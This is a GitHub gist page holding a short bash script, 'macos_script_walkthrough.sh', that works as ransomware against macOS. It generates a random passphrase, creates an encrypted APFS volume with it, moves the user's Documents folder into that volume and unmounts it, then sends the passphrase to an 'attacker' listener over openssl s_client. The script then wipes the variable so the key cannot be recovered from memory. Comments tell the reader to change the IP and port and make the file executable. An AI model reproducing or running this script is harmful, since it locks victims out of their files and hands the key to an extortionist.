Skip to content

Instantly share code, notes, and snippets.

@PonchoSec
Created September 20, 2022 11:26
Show Gist options
  • Save PonchoSec/1ac71357495534f4e10e7d9a68f22c6c to your computer and use it in GitHub Desktop.
Save PonchoSec/1ac71357495534f4e10e7d9a68f22c6c to your computer and use it in GitHub Desktop.
macos_script_walkthrough.sh
#! /usr/bin/env bash
# Creating random and unique password
p=$(head -n 1024 /dev/urandom | strings| grep -o "[[:alnum:]]" | head -n 64| tr -d "\n");
# Identify Disk (Apple File System Volume)
disk_name=$(diskutil info / | grep "APFS Container:" | tr -s " "| cut -d" " -f4);
# Creating APFS Volume (aka drive) and encrypting it with password
diskutil apfs addVolume "${disk_name}" APFS XX -passphrase "${p}";
# Moving important files to the drive
mv -f ~/Documents/* /Volumes/XX;
# Unmounting drive
diskutil umount XX;
# echo'ing the password to the attacker using OpenSSL
echo $p | timeout 2 openssl s_client -quiet -connect 127.0.0.1:9001 2>/dev/null;
# Added this to ensure that the creentials cannot be recovered via memory dump
p="";
# change the IP address and Port number
# Use chmod +x name.sh to make the script executable
# name: <name>.sh
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment